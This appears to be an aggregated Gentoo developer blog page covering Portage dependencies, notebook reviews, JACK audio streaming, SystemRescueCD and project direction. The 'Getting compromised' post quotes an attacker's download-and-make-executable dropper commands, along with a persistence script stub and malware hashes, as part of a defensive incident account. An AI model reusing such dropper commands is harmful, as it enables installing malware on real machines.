[ebuild  N     ] dev-perl/XML-LibXML-2.1.400-r1  USE="{-test}" 0 KiB
[ebuild  N     ] dev-perl/XML-Simple-2.200.0-r1  0 KiB
[ebuild  N     ] x11-misc/icon-naming-utils-0.8.90  0 KiB
[ebuild  NS    ] sys-devel/automake-1.15:1.15 [1.13.4:1.13, 1.14.1:1.14] 0 KiB
[ebuild     U  ] sys-devel/libtool-2.4.5:2 [2.4.4:2] USE="-vanilla" 0 KiB
[ebuild  N     ] x11-proto/xproto-7.0.26  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xextproto-7.3.0  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/inputproto-2.3.1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/damageproto-1.2.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/xtrans-1.3.5  USE="-doc" 0 KiB
[ebuild  N     ] x11-proto/renderproto-0.11.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/font-util-1.3.0  0 KiB
[ebuild  N     ] x11-misc/util-macros-1.19.0  0 KiB
[ebuild  N     ] x11-proto/compositeproto-0.4.2-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/recordproto-1.14.2-r1  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libICE-1.0.9  USE="ipv6 -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libSM-1.2.2-r1  USE="ipv6 uuid -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/fixesproto-5.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/randrproto-1.4.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/kbproto-1.0.6-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xf86bigfontproto-1.2.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXau-1.0.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdmcp-1.1.1-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/libpthread-stubs-0.3-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pixman-0.32.6  USE="sse2 (-altivec) (-iwmmxt) (-loongson2f) -mmxext (-neon) -ssse3 -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  NS    ] app-text/docbook-xml-dtd-4.4-r2:4.4 [4.1.2-r6:4.1.2, 4.2-r2:4.2, 4.5-r1:4.5] 0 KiB
[ebuild  N     ] app-text/xmlto-0.0.26  USE="-latex" 0 KiB
[ebuild  N     ] sys-apps/dbus-1.8.12  USE="-X -debug -doc (-selinux) -static-libs -systemd {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] net-misc/curl-7.40.0  USE="ipv6 ssl -adns -idn -kerberos -ldap -metalink -rtmp -samba -ssh -static-libs {-test} -threads" ABI_X86="(64) -32 (-x32)" CURL_SSL="openssl -axtls -gnutls -nss -polarssl (-winssl)" 0 KiB
[ebuild  N     ] app-arch/libarchive-3.1.2-r1:0/13  USE="acl bzip2 e2fsprogs iconv lzma zlib -expat -lzo -nettle -static-libs -xattr" 0 KiB
[ebuild  N     ] dev-util/cmake-3.1.0  USE="ncurses -doc -emacs -qt4 (-qt5) {-test}" 0 KiB
[ebuild  N     ] media-gfx/graphite2-1.2.4-r1  USE="-perl {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/fontconfig-2.11.1-r2:1.0  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-admin/eselect-fontconfig-1.1  0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-1.42.0  USE="-cairo -doctool {-test}" PYTHON_TARGETS="python2_7" 0 KiB
[ebuild  N     ] dev-libs/atk-2.14.0  USE="introspection nls {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-util/gdbus-codegen-2.42.1  PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-proto/xcb-proto-1.11  ABI_X86="(64) -32 (-x32)" PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-libs/libxcb-1.11-r1:0/1.11  USE="-doc (-selinux) -static-libs -xkb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libX11-1.6.2  USE="ipv6 -doc -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXext-1.3.3  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXfixes-5.0.1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrender-0.9.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/cairo-1.12.18  USE="X glib svg (-aqua) -debug (-directfb) (-drm) (-gallium) (-gles2) -opengl -openvg (-qt4) -static-libs -valgrind -xcb -xlib-xcb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXi-1.7.4  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gdk-pixbuf-2.30.8:2  USE="X introspection -debug -jpeg -jpeg2k {-test} -tiff" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcursor-1.1.14  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdamage-1.1.4-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrandr-1.4.2  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcomposite-0.4.4-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXtst-1.2.2  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-core-2.14.1:2  USE="X introspection" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-atk-2.14.1:2  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/harfbuzz-0.9.37:0/0.9.18  USE="cairo glib graphite introspection truetype -icu -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pango-1.36.8  USE="introspection -X -debug" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gtk+-2.24.25-r1:2  USE="introspection (-aqua) -cups -debug -examples {-test} -vim-syntax -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/librsvg-2.40.6:2  USE="introspection -tools -vala" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-themes/adwaita-icon-theme-3.14.1  USE="-branding" 0 KiB
[ebuild  N     ] x11-libs/gtk+-3.14.6:3  USE="X introspection (-aqua) -cloudprint -colord -cups -debug -examples {-test} -vim-syntax -wayland -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/dconf-0.22.0  USE="X {-test}" 0 KiB

Total: 78 packages (6 upgrades, 70 new, 2 in new slots), Size of downloads: 0 KiB

The following USE changes are necessary to proceed:
 (see "package.use" in the portage(5) man page for more details)
# required by x11-libs/gtk+-2.24.25-r1
# required by x11-libs/gtk+-3.14.6
# required by gnome-base/dconf-0.22.0[X]
# required by dev-libs/glib-2.42.1
# required by media-libs/harfbuzz-0.9.37[glib]
# required by x11-libs/pango-1.36.8
# required by gnome-base/librsvg-2.40.6
# required by x11-themes/adwaita-icon-theme-3.14.1
=x11-libs/cairo-1.12.18 X
BOOM. That's heavy. There's gtk2, gtk3, most of X ... and things want to enable USE="X" ... what's going on?!

After some experimenting with selective masking and tracing dependencies I figured out that it's dev-libs/glib that pulls in "everything". Eh?
ChangeLog says:
  21 Jan 2015; Pacho Ramos  -files/glib-2.12.12-fbsd.patch,
  -files/glib-2.38.2-configure.patch, -files/glib-2.38.2-sigaction.patch,
  -glib-2.38.2-r1.ebuild, -glib-2.40.0-r1.ebuild, glib-2.42.1.ebuild:
  Ensure dconf is present (#498436, #498474#c6), drop old
So now glib depends on dconf (which is actually not correct, but fixes some bugs for gtk desktop apps). dconf has USE="+X" in the ebuild, so it overrides profile settings, and pulls in the rest.
USE="-X" still pulls in dbus unconditionally, and ... dconf is needed by glib, and glib is needed by pkgconfig, so that would be mildly upsetting as every user would now have dconf and dbus installed. (Unless, of course, we switched pkgconfig to USE="internal-glib")

After a good long discussion on IRC with some good comments on the bugreport we figured out a solution that should work for all:
The dconf ebuild is fixed to not set default useflags, so only desktop profiles or USE="X" set by users will pull in X-related dependencies. glib gets a dbus useflag, which is default-enabled on desktop profiles, so there the dependency chain works as desired. And for the no-desktop no-X usecase we have no extra dependencies, and no reason to be grumpy.
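For anyone who ran into this before the fix landed, the local override boils down to a one-line /etc/portage entry. A sketch (flag name as discussed above; the file path is the standard Portage location):

```
# /etc/portage/package.use
# Keep dconf from dragging X onto a headless box:
gnome-base/dconf -X
```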

This situation shows quite well how unintended side-effects may happen. The situation looked good for everyone on a desktop profile (and dconf is small enough to be tolerated as dependency). But on not-desktop profiles, suddenly, we're looking at a pile of 'wrong' dependencies, accidentally forced on everyone. Oops :)

In the end, all is well, and I'm still confused why writing a config file needs dbus and xml and stuff. But I guess that's called progress ...

January 21, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Old Gentoo system? Not a problem… (January 21, 2015, 21:05 UTC)

If you have a very old Gentoo system that you want to upgrade, you might have some issues with too-old software and a Portage that can’t just upgrade to a recent state. Although many methods exist to work around it, one that I have found to be very useful is to have access to old Portage snapshots. It often allows the administrator to upgrade the system in stages (say, in 6-month blocks), perhaps not the entire world but at least the system set.

Finding old snapshots might be difficult though, so at one point I decided to create a list of old snapshots, two months apart, together with the GPG signature (so people can verify that the snapshot was not tampered with by me in an attempt to create a Gentoo botnet). I haven’t needed it in a while, but I still try to update the list every two months, which I just did with the snapshot of January 20th this year.

I hope it at least helps a few other admins out there.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Demo Operating Systems on new hardware (January 21, 2015, 10:16 UTC)

Recently I got to interact with two Lenovo notebooks - an E445 with Ubuntu Demo preinstalled, and an E431 with Win8 Demo preinstalled.
Why do I say demo? Because these were completely unusable. Let me explain ...

The E445 is a very simple notebook - 14" crap display, slowest AMD APU they could find, 4GB RAM (3 usable due to graphics card stealing the rest). Slowest harddisk ever ;)
The E431 is pretty much the same form factor, but the slowest Intel CPU (random i3) and also 4GB RAM and a crap display.

On powerup the E445 spent about half an hour "initialising" and kinda installing whatever. Weird, because you could do that beforehand and deliver an instant-on disk image, but this whole thing hasn't been thought out.
The Ubuntu version it comes with (12.04 LTS I think?) is so old that the graphics drivers can't drive the display at native resolution out of the box. So your display will be a fuzzy 1024x768 upscaled to 1366x768. I consider this a demo because there's some obvious bugs - the black background glows purple, there's random output from init scripts bleeding over the bootsplash. And then once you login there's this ... hmm. Looks like a blend of MovieOS and a touchscreen UI and goes by the name of Unity. The whole mix is pretty much unusable, mostly because basic things like screen resolution are broken in ways that are not easy to fix.

The other device came with a Win8 demo. Out of the box it takes about 5 minutes to start, and then every app takes 30-60 seconds to start. It's brutally slow.
After boot about 2.5GB RAM are in use, so pretty much any action can trigger swapping. It's brutally slow. Oh wait, I already said that.
At some point it decided to update to 8.1, which took half an hour to download and about seven hours to install. WHAT TEH EFF!

The UI is ... MovieOS got drunk. A part is kinda touchscreen thingy, and the rest is even more confused. Localization is horribad (some parts are pictogram only, some parts are text only - and since this is a chinese edition I wouldn't even know how to reboot it! squiggly hat box squiggly bug ... or is it square squiggly star?). Oh my, this is just bad.
And I said demo, because shutdown doesn't. Looks like the hibernate and shutdown bugs are crosswired the wrong way?
There's random slowdowns doing basic tasks, even youtube video randomly stutters and glitches because the OS is still not ready for general use. And it's slow ... oh wait, I said that. So all in all, it's a nice showroom demo, but not useful.

Installing Gentoo was all in all pretty boring; with full KDE running, memory usage is near 500MB (compared to >2GB for the Win demo). Video runs smoothly, audio works. The Ethernet connection with r8169 works; WLAN with the BCM43142 requires broadcom-sta aka wl. A very, very bad driver; it'd be easier to not have this device built in.
Both the intel card in the E431 and the radeon in the E445 work well, although the HD 8550G needs the newest release of xf86-video-ati to work.

The E445 boots cleanly in BIOS mode; the E431 quietly fails (sigh) because of SecureBoot (sigh!) unless you actively disable it. Also, the E431 randomly tries to reset to factory defaults, or fails to boot with a fan warning. Very shoddy, but usually smacking it with a hammer helps.

I'm a little bit sad that all new notebooks are so conservative with maximum amount of RAM, but on the upside the minimum is defined by Win8 Demo requirements. So most devices have 4GB RAM, which reminds me of 2008. Hmm.
Harddisks are getting slower and bigger - this seems to be mostly penny pinching. The harddisk in the R400 I had years ago was faster than the new ones!

And vendors should maybe either sell naked notebooks without an OS, or install something that is properly installed and preconfigured. And, maybe, include a proper recovery DVD so that the OS can be reinstalled? Especially as both these notebooks come with a DVD drive. I can't say whether it works, because I lack media to test with, but it wastes space ...

(If you are a vendor, and want to have things tested or improved, feel free to send me free hardware and maybe consider compensating me for my time - it's not that hard to provide a good user experience, and it'll improve customer retention a lot!)

Getting compromised (January 21, 2015, 09:16 UTC)

Recently I was asked to set up a new machine. It had been minimally installed, network started, and then ignored for a day or two.

As I logged in I noticed a weird file in /root: n8005.tar
And 'file' said it's a shellscript. Hmmm ....

wget http://432.567.99.1/install/8005
chmod +x 8005

At this point my confidence in the machine had been ... compromised. "init 0" it is!
A reboot from a livecd later I was trying to figure out what the attacker was trying to do:
* An init script in /etc/init.d
# chkconfig: 12345 90 90
# description: epnlmqmjph
# Provides:             epnlmqmjph
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    epnlmqmjph
case $1 in
* A file in /usr/bin
# file epnlmqmjph
epnlmqmjph: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

# md5sum epnlmqmjph
2cb5174e26c6782db94ea336696cfb7f  epnlmqmjph
* a file in /sbin I think - I didn't write down everything, just archived it for later analysis
# file bin_z 
bin_z: ERROR: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linkederror reading (Invalid argument)
# md5sum bin_z 
85c1c4a5ec7ce3efef5c5b20c5ded09c  bin_z
The only action I could do at this stage was wipe and reinstall, and so I did.
So this was quite educational, and a few minutes after the reboot I saw a connection with PuTTY as the client version string in the ssh logs.
Sorry kid, not today ;)
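The triage steps above (file to identify, md5sum to fingerprint) are easy to replay. A self-contained sketch on a harmless stand-in file (the filename and contents here are made up):

```shell
# Triage a suspicious file without executing it:
printf 'hello\n' > suspicious.bin
file suspicious.bin       # what does it claim to be?
md5sum suspicious.bin     # fingerprint for comparison with known samples
sha256sum suspicious.bin  # md5 is weak; record a stronger hash too
```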

There's a strong lesson in this: do not use ssh passwords, especially for root. A weak password can be brute-forced in a day or two!
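To see whether you're being brute-forced, counting failed password attempts per source address in the sshd log is enough. A sketch run against a small inlined sample (real logs live in /var/log/auth.log or /var/log/secure depending on the distribution; the IPs here are documentation addresses):

```shell
# Count failed ssh password attempts per source IP.
cat > auth.sample <<'EOF'
Jan 21 09:01:02 host sshd[123]: Failed password for root from 203.0.113.5 port 4711 ssh2
Jan 21 09:01:05 host sshd[124]: Failed password for root from 203.0.113.5 port 4712 ssh2
Jan 21 09:02:17 host sshd[125]: Failed password for invalid user admin from 198.51.100.7 port 2222 ssh2
EOF
grep 'Failed password' auth.sample \
  | awk '{for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1)}' \
  | sort | uniq -c | sort -rn
```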

sshd has an awesome feature: "PermitRootLogin without-password". If you rely on root logins, at least avoid successful password logins!
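In sshd_config terms that's a two-line change (a minimal fragment; note that on OpenSSH 7.0 and later the "without-password" value was renamed to "prohibit-password"):

```
# /etc/ssh/sshd_config
# Root may still log in, but never with a password:
PermitRootLogin without-password
# Better still: disable password authentication for everyone.
PasswordAuthentication no
```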

And I wonder how much accidental security running not-32bit not-CentOS gives ;)

January 19, 2015
Cinnamon 2.4 (January 19, 2015, 11:55 UTC)

A few weeks ago, I upgraded all cinnamon ebuilds to 2.4 in tree. However I could not get Cinnamon (the shell part) to actually work, as in show anything useful on my display. So this is a public service announcement: if you like Cinnamon and want to help with this issue, please visit bug #536374. For some reason, the hacks found in gnome-shell do not seem to work with cinnamon’s shell.

January 16, 2015
Michał Górny a.k.a. mgorny (homepage, bugs)
Surround sound over network with Windows 8 (January 16, 2015, 15:26 UTC)

I’ve got a notebook with some fancy HD Audio sound card (stereo!), and a single output jack — not a sane way to get surround sound (sure, cool kids use HDMI these days). Even worse, connecting an external amplifier to the jack results in catching a lot of electrical interference. Since I also have a PC which has surround speakers connected, I figured it would be a good idea to stream the audio over the network.

On non-Windows, the streaming would be trivial to set up: likely PulseAudio on both machines, a few setup bits, and done. If you are looking for a guide on how to do such a thing in Windows, you'll likely end up setting up an icecast server listening to the stereo mix. Bad twice: firstly, stereo-only; secondly, poor latency. Now imagine playing a game or watching a movie with sound noticeably delayed after the picture (well, in the movie player you could at least play with the A/V delay to work around that). But there must be another way…

The ingredients

In order to get a working surround sound system, you need to have:

  1. two JACK2 servers — one on each computer,
  2. ASIO4ALL,
  3. and an ASIO-friendly virtual sound device such as VB-Audio Hi-Fi Cable.

Install the JACK server on the computer with speakers, and all the tools on the other machine.

Setting up the JACK slave (on speaker-PC)

I’m going to start with setting up the speaker-PC since it’s simpler. It can run basically any operating system, though I’m using Gentoo Linux for this guide. JACK is set up pretty much the same everywhere, with the only difference in used audio driver.

The choice of master vs. slave is pretty much arbitrary. The slave needs to either combine a regular audio driver with netadapter, or the net driver with audioadapter. I’ve used the former.

First, install JACK2. In Gentoo, it can be found in the pro-audio project overlay. A good idea is to disable D-Bus support (USE=-dbus) since I wasn’t able to get JACK running with it and the ebuild doesn’t build regular jackd when D-Bus support is enabled.

Afterwards, start JACK with the desired sound driver and a surround-capable device. You will want to specify a sample rate and bit depth too; best match them to the application you’re planning to use. For example:

$ jackd -R -d alsa -P surround40 -r 48000 -S

This starts the JACK daemon with real-time priority support (important for low latency), using ALSA playback device surround40 (4-speaker surround), 48 kHz sample rate and 16-bit samples.

Afterwards, load netadapter with matching number of capture channels, and connect them to the output channels:

$ jack_load netadapter -i '-C 4'
$ jack_connect netadapter:capture_1 system:playback_1
$ jack_connect netadapter:capture_2 system:playback_2
$ jack_connect netadapter:capture_3 system:playback_3
$ jack_connect netadapter:capture_4 system:playback_4
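The four jack_connect calls generalize to any channel count. Since no JACK server runs here, this sketch only prints the commands it would issue; drop the echo to actually run them:

```shell
# Dry-run: print the jack_connect calls for an N-channel setup.
CHANNELS=4
i=1
while [ "$i" -le "$CHANNELS" ]; do
    echo jack_connect "netadapter:capture_$i" "system:playback_$i"
    i=$((i + 1))
done
```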

At this point, slave is ready. JACK will wait for a master to start, and will forward any audio received from the master to the local sound card surround output. Since JACK2 supports zero-configuration networking, you don’t need to specify any IP addresses.

Setting up the virtual device

After getting the slave up, it’s time to set up the sound source. After installing all the components, the first goal is to set up the virtual audio device. Once the Hi-Fi Cable package is installed (no need to reboot), the system should start seeing two new devices — a playback device called ‘Hi-Fi Cable Input’ and a recording device called ‘Hi-Fi Cable Output’. Now open the sound control panel applet and:

  1. select ‘Hi-Fi Cable Input’ as the default output device.
  2. Right-click it and configure speakers. Select whatever configuration is appropriate for your real speaker set (e.g. quad speakers).
  3. (Optionally) right-click it and open properties. On the advanced tab select sample rate and bit depth. Afterwards, open properties of the ‘Hi-Fi Cable Output’ recording device and set the same parameters.

Control Panel sound settings with virtual Hi-Fi Cable Input device
Advanced Hi-Fi Cable Input device properties (sample rate and bit depth setting)

As you may notice, even after setting the input to multiple speakers, the output will still be stereo. That’s a bug (limitation?) we’re going to work around soon…

Setting up the JACK master

Now that the device is ready, we need to start setting up JACK. On Windows, the ‘Jack Control’ GUI is probably the easiest way. Start with ‘Setup’. Ensure that the ‘portaudio’ driver is selected, and choose ‘ASIO::ASIO4ALL v2’ as both the input and output device. The right-arrow button right of the text inputs should provide a list of devices to select from. Additionally, select the sample rate matching the one set for the virtual device and the JACK slave.

JACK setup window

Now, we need to load the netmanager module. Similarly to the slave setup, this is done using jack_load. To get this fully automated, you can use the ‘Execute script after startup’ option from the ‘Options’ (right-arrow button is not helpful this time). Create a new .bat file somewhere, and put the following command inside:

jack_load netmanager

Save the file and select it as the post-startup script. Now the module will be automatically loaded every time you start JACK via Jack Control. You may also fine-tune some of the ‘Misc’ settings to fit your preferences. Then confirm with ‘Ok’ and click ‘Start’. If everything went well so far, after clicking ‘Connect’ you should see both ‘System’ and the slave’s hostname (assuming it is up and running). Do not connect anything yet, just verify that JACK sees the slave.

Connecting the virtual sound card to JACK

Now that JACK is ready, it’s time to connect the virtual sound card to the remote host. The traditional way of doing that would be to connect the local recording device (stereo mix or Virtual Cable Output) to the respective remote pins. However, that would mean just stereo. Instead, we have to cheat a little.

One of the fancy features of VB-Audio’s Virtual Hi-Fi Cable is that it supports using ASIO-compatible sound processors. In other words, the sound from the virtual cable input is directed into an ASIO output port for processing. The good news is that the stereo stripping occurs directly in the virtual cable output, so ASIO still gets all the channels. All we have to do is capture the sound there…

Find VB-Cable’s ‘ASIO Bridge’ and start it. If the button in the middle states ‘ASIO OFF’, switch it to enable ASIO. Then click on the ‘Select A.S.I.O. Device’ text below it and select ‘JackRouter’. If everything went well, ‘VBCABLE_AsioBridge’ should appear in the JACK connection panel.

ASIO Bridge window

The final touches

Now that everything’s in place, it’s just a matter of connecting the right pins. To avoid having to connect them manually every time, use the ‘Patchbay’ panel. First, use ‘Add’ on left-hand side to add an output socket, select ‘VBCABLE_AsioBridge’ client and keep clicking ‘Add plug’ for all the input channels. Then, ‘Add’ on right-hand side, your remote host as client and add all the output channels. Now select both new sockets and ‘Connect’.

JACK patchbay setup

Save your new patchbay definition somewhere, and ‘Activate’ it. If you did well, the connections window should now show connections between respective local and remote pins and you should be able to hear sound from the remote speakers.

JACK connections window after setup

Now you can open ‘Setup’ again, and on the ‘Options’ tab activate patchbay persistence. Select your newly created patchbay definition file and from now on, starting JACK should enable the patchbay, and the patchbay should ensure that the pins are connected every time they reappear.

Maintenance notes

First of all, you usually don’t need to set an explicit connection between your virtual device and the real system audio device. On my system that connection is established automatically, so the sound reaches both the remote host and the local speakers. If that’s not what you want, just mute the sound card…

Secondly, note that the virtual sound card is now the default device, so applications will control its volume (for both remote and local speakers). If you want to mute the local speakers, you need to open the mixer and select your local sound card from the device drop-down.

Thirdly, VBCABLE_AsioBridge likes to disappear occasionally when restarting JACK. If you don’t see it in the connections, just turn it off and on again (the ‘ASIO ON’ button) and it should reappear.

Fourthly, if you hear skipping, you can try playing with ‘Frames/Period’ in JACK’s setup. Or reduce the sample rate.

January 14, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Cool Gentoo-derived projects (I): SystemRescueCD (January 14, 2015, 22:53 UTC)

Gentoo Linux is the foundation for quite a few very cool and useful projects. So, I'm starting (hopefully) a series of blog posts here... and the first candidate is a personal favourite of mine, the famous SystemRescueCD.
Ever needed a powerful Linux boot CD with all possible tools available to fix your system? You switched hardware and now your kernel hangs on boot? You want to shrink your Microsoft Windows installation to the absolute minimum to have more space for your penguin picture collection? Your Microsoft Windows stopped booting but you still need to get your half-finished PhD thesis off the hard drive? Or maybe you just want to install the latest and greatest Gentoo Linux on your new machine?

For all these cases, SystemRescueCD is the Swiss army knife of your choice. With lots of hardware support, filesystem support, software, and boot options ranging from CD and DVD to installation on USB stick and booting from a floppy disc (!), just about everything is covered. In addition, SystemRescueCD comes with a lot of documentation in several languages.

The page on how to create customized versions of SystemRescueCD gives a few glimpses of how Gentoo is used here. (I'm also playing with a running version in a virtual machine while I type this. :) Basically, the internal filesystem is a normal Gentoo x86 (i.e. 32bit userland) installation, with distfiles, the portage tree, and some development files (headers etc.) removed to decrease disk space usage. (Skimming over the files in /etc/portage, the only really unusual thing I can see is that >=gcc-4.5 is masked; the installed GCC version is 4.4.7 - but who cares in this particular case.) After uncompressing the filesystem and re-adding the Gentoo portage tree, it can be used as a chroot, and (with some re-emerging of dependencies because of the deleted header files) packages can be added, deleted, or modified.
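A rough sketch of that customization workflow, assuming the compressed root filesystem sits in a file like sysrcd.dat on the mounted CD (the paths and the filename here are assumptions; check the customization page for the real procedure):

```shell
# Unpack the squashfs root filesystem into a working directory
mkdir -p /tmp/sysresccd/rootfs
# sudo unsquashfs -f -d /tmp/sysresccd/rootfs /mnt/cdrom/sysrcd.dat
# Make the tree usable as a chroot (needs root):
#   sudo mount --bind /proc /tmp/sysresccd/rootfs/proc
#   sudo mount --bind /dev  /tmp/sysresccd/rootfs/dev
#   sudo chroot /tmp/sysresccd/rootfs /bin/bash
# Inside the chroot: re-add the portage tree, re-emerge dependencies whose
# header files were deleted, then add/remove packages with emerge as usual.
```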

Downsides? Well, not many. Even if you select a 64bit kernel on boot, the userland will always be 32bit. Which is fine for maximum flexibility and running on ancient hardware, but of course imposes the usual limits. And rsync then runs out of memory after copying a few TByte of data (hi Patrick)... :D

Want to try? Just emerge app-admin/systemrescuecd-x86 and you'll comfortably find the ISO image installed on your harddrive in /usr/share/systemrescuecd/.

From the /root/AUTHORS file in the rescue system:
SystemRescueCd (x86 edition)

* Main Author:  Francois Dupoux
* Other contributors:
  - Jean-Francois Tissoires (Oscar and many help for testing beta versions)
  - Franck Ladurelle (many suggestions, and help for scripts)
  - Pierre Dorgueil (reported many bugs and improvements)
  - Matmas did the port of linuxrc for loadlin
  - Gregory Nowak (tested the speakup)
  - Fred alias Sleeper (Eagle driver)
  - Thanks to Melkor for the help to port to unicode

Donnie Berkholz a.k.a. dberkholz (homepage, bugs)
Gentoo needs focus to stay relevant (January 14, 2015, 03:36 UTC)

After nearly 12 years working on Gentoo and hearing blathering about how “Gentoo is about choice” and “Gentoo is a metadistribution,” I’ve come to a conclusion about where we need to go if we want to remain viable as a Linux distribution.

If we want to have any relevance, we need to have focus. Everything for everybody is a guarantee that you’ll be nothing for nobody. So I’ve come up with three specific use cases for Gentoo that I’d like to see us focus on:

People developing software

As Gentoo comes, by default, with a guaranteed-working toolchain, it’s a natural fit for software developers. A few years back, I tried to set up a development environment on Ubuntu. It was unbelievably painful. More recently, I attempted the same on a Mac. Same result — a total nightmare if you aren’t building for Mac or iOS.

Gentoo, on the other hand, provides a proven-working development environment because you build everything from scratch as you install the OS. If you need headers or some library, it’s already there. No problem. Whereas I’ve attempted to get all of the barebones dev packages installed on many other systems and it’s been hugely painful.

Frankly, I’ve never come across as easy a dev environment as Gentoo, if you’ve managed to set it up as a user in the first place. And that’s the real problem.

People who need extreme flexibility (embedded, etc.)

Nearly 10 years ago, I founded the high-performance clustering project in Gentoo, because it was a fantastic fit for my needs as an end user in a higher-ed setting. As it turns out, it was also a good fit for a number of other folks, primarily in academia but also including the Adelie Linux team.

What we found was that you could get an extra 5% or so of performance out of building everything from scratch. At small scale that sounds absurd, but when that translates into 5-6 digits or more of infrastructure purchases, suddenly it makes a lot more sense.

In related environments, I worked on porting v5 of the Linux Terminal Server Project (LTSP) to Gentoo. This was the first version that was distro-native vs pretending to be a custom distro in its own right, and the lightweight footprint of a diskless terminal was a perfect fit for Gentoo.

In fact, around the same time I fit Gentoo onto a 1.8MB floppy-disk image, including either the dropbear SSH client or the kdrive X server for a graphical environment. This was only possible through the magic of the ROOT and PORTAGE_CONFIGROOT variables, which you couldn’t find in any other distro.
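The trick those variables enable can be sketched as follows (the paths and the package name are illustrative; a real build also needs a profile and make.conf under the config root):

```shell
# Install packages into an alternate root instead of /
export PORTAGE_CONFIGROOT=/tmp/tiny-config   # portage reads its config from here
export ROOT=/tmp/tiny-root                   # packages get merged here
mkdir -p "$ROOT" "$PORTAGE_CONFIGROOT/etc/portage"
# emerge --root="$ROOT" net-misc/dropbear    # would land in $ROOT, not in /
```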

Other distros such as ChromeOS and CoreOS have taken similar advantage of Gentoo’s metadistribution nature to build heavily customized Linux distros.

People who want to learn how Linux works

Finally, another key use case for Gentoo is for people who really want to understand how Linux works. Because the installation handbook actually walks you through the entire process of installing a Linux distro by hand, you acquire a unique viewpoint and skillset regarding what it takes to run Linux, well beyond what other distros require. In fact I’d argue that it’s a uniquely portable and low-level skillset that you can apply much more broadly than those you could acquire elsewhere.

In conclusion

I’ve suggested three core use cases that I think Gentoo should focus on. For anything that doesn’t fit those use cases, I would suggest that we allow it, but not specifically dedicate effort to enabling it.

We’ve become deadened to how people want to use Linux, and this is my proposal for how we could regain that relevance.

Tagged: gentoo

January 12, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Tool to preview Grub2 themes easily (using KVM) (January 12, 2015, 21:04 UTC)

The short version: previewing a Grub2 theme live does not have to be hard.


